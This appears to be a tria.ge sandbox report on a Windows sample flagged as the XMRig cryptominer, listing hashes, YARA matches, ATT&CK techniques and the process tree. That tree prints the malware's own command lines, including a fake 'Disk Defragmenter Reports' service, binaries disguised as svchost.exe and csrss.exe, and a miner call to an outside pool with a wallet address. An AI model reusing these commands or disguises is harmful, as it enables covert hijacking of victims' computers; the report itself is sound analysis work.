Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 145s
max time network: 145s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 23/12/2024, 15:20

Static task: static1
Behavioral task: behavioral1
Sample: ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Resource: win7-20240903-en
General
Target: ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Size: 910KB
MD5: ca0fb79fde083ec2ba5625c6d1c208d8
SHA1: eb215b41f55ac1588d09354f5b1d32d5de92f248
SHA256: ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229
SHA512: e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7
SSDEEP: 12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr
Malware Config
Signatures
Xmrig family

XMRig Miner payload 1 IoCs
yara_rule xmrig: behavioral1/files/0x0007000000014a05-30.dat

Drops file in Drivers directory 2 IoCs
File opened for modification: C:\Windows\System32\drivers\etc\hosts (irsetup.exe)
File created: C:\Windows\System32\drivers\etc\hosts (irsetup.exe)

Executes dropped EXE 6 IoCs
PID 2424 irsetup.exe
PID 2868 svchost.exe
PID 2604 svchost.exe
PID 476 Process not Found
PID 2664 svchost.exe
PID 2972 csrss.exe

Loads dropped DLL 9 IoCs
PID 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
PID 2424 irsetup.exe (5 entries)
PID 2744 cmd.exe (2 entries)
PID 2664 svchost.exe

yara_rule upx:
behavioral1/files/0x000800000001471c-1.dat
behavioral1/memory/1852-4-0x0000000002730000-0x0000000002857000-memory.dmp
behavioral1/memory/2424-10-0x0000000000530000-0x0000000000657000-memory.dmp
behavioral1/memory/2424-50-0x0000000000400000-0x0000000000527000-memory.dmp
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
PID 2516 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: PING.EXE (3 entries), ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe, irsetup.exe, cmd.exe, sc.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
PID 2384 PING.EXE; PID 1028 PING.EXE; PID 692 PING.EXE
Runs ping.exe 1 TTPs 3 IoCs
PID 2384 PING.EXE; PID 1028 PING.EXE; PID 692 PING.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs
Token: SeLockMemoryPrivilege, PID 2972 csrss.exe
Suspicious use of SetWindowsHookEx 2 IoCs
PID 2424 irsetup.exe (2 entries)
Suspicious use of WriteProcessMemory 53 IoCs
Source PID -> target PID (source process, procid_target), number of recorded writes:
PID 1852 wrote to memory of 2424 (ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe, 28): 7 entries
PID 2424 wrote to memory of 2744 (irsetup.exe, 29): 7 entries
PID 2744 wrote to memory of 2868 (cmd.exe, 31): 4 entries
PID 2744 wrote to memory of 2384 (cmd.exe, 32): 7 entries
PID 2744 wrote to memory of 2516 (cmd.exe, 33): 7 entries
PID 2744 wrote to memory of 1028 (cmd.exe, 34): 7 entries
PID 2744 wrote to memory of 2604 (cmd.exe, 35): 4 entries
PID 2664 wrote to memory of 2972 (svchost.exe, 38): 3 entries
PID 2744 wrote to memory of 692 (cmd.exe, 39): 7 entries
Processes
(indentation shows the parent/child depth of the process tree)

C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
PID: 1852
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe
    Command line: __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
    PID: 2424
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c C:\ProgramData\Temp\run64.bat
        PID: 2744
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

            C:\ProgramData\Temp\svchost.exe
            Command line: C:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
            PID: 2868
            - Executes dropped EXE

            C:\Windows\SysWOW64\PING.EXE
            Command line: ping -n 3 127.0.0.1
            PID: 2384
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

            C:\Windows\SysWOW64\sc.exe
            Command line: sc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"
            PID: 2516
            - Launches sc.exe
            - System Location Discovery: System Language Discovery

            C:\Windows\SysWOW64\PING.EXE
            Command line: ping -n 2 127.0.0.1
            PID: 1028
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

            C:\ProgramData\Temp\svchost.exe
            Command line: C:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"
            PID: 2604
            - Executes dropped EXE

            C:\Windows\SysWOW64\PING.EXE
            Command line: ping -n 3 127.0.0.1
            PID: 692
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

C:\ProgramData\Temp\svchost.exe
Command line: C:\ProgramData\Temp\svchost.exe
PID: 2664
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory

    C:\ProgramData\Temp\csrss.exe
    Command line: "C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
    PID: 2972
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 413KB
MD5: 9fb6eb5b8e72e6671765a91f12f273fb
SHA1: e476d2caaaf8506d8798cca874ab70f31a23a44f
SHA256: 9a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4
SHA512: 3e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed

Filesize: 484B
MD5: 39a4b61f3776e96201ff30b4f4a28afd
SHA1: f293bfe02dd2b058330dce8a3ddab23ac5ea708d
SHA256: 27ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02
SHA512: b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8

Filesize: 345KB
MD5: 1e706b1e8d3bd3764e3ee4bf5fe509d8
SHA1: ba457bfcdc1b66609f142c3578be647c51d1356d
SHA256: 29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74
SHA512: f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924

Filesize: 440KB
MD5: 75ca7ff96bf5a316c3af2de6a412bd54
SHA1: 0a093950790ff0dddff6f5f29c6b02c10997e0c5
SHA256: d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1
SHA512: b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4